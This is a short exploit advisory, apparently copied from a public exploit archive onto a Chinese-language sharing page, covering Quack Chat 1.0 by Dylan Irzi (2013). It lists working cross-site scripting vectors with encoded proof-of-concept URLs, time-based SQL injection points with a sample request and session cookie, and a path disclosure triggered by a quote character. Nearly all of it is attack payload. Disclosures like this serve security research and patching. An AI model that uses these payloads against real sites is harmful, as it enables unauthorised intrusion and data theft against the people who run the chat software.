扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 |
########################################################################################### # Exploit Title: Quack Chat 1.0 - XSS / SQL Injection / Path Diclosure # Date: 15 de Agosto del 2013 # Exploit Author: Dylan Irzi # Credit goes for: websecuritydev.com # Vendor Homepage: http://www.quack-chat.com/ # Tested on: Win8 & Linux Mint # Affected Version : 1.0 # Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/} # Greetz: All team WebSecuritydev. ########################################################################################### Cross Site Scripting: Archivos Afectados Afectados qchat.php qc_admin/index.php?p=history PoC: localhost/qchat.php Vector: ""><img src=x onerror=prompt(/XSS/);>> Input: <input id="name" type="text" style="width:200px;" name="name"> Is Reflected: localhost/qc_admin/index.php?p=history PoC #2: localhost/qc_admin/index.php?p=history&page=2+(XSS Vector) Example: localhost/qc_admin/index.php?p=history&page=2%22%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSS/%29;%3E%3E ------------------------------------------------------------------- SQL Injection localhost/qc_admin/index.php?p=history&id=(SQL Injection) localhost/qc_admin/index.php?p=history&page=(SQL Injection) # Exploit-DB note: Here's a PoC: # <server>/qc_admin/index.php?p=history&id=1 and sleep(10) Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Cookie: PHPSESSID=7d87f318548027737ae3893189e2ff0e (Remplazar por una Session Cookie Valida) ------------------------------------------------------------------- Path Diclosure localhost/qc_admin/index.php?p=history&id=' in /var/www/chat/qc_admin/index.php on line 249 -------------------------------------------------------------------- *By Dylan Irzi @Dylan_Irzi11 Pentest de Seguridad. * |
体验盒子
